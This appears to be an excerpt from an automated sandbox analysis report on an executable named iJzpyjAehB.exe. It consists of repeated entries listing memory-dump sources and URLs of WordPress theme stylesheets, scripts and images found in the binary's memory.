                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant-226x300.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-1024x682.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-300x200.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-768x512.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296882076.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292770939.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.295151770.00000000035D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210921_202844_701-1024x683.jpg
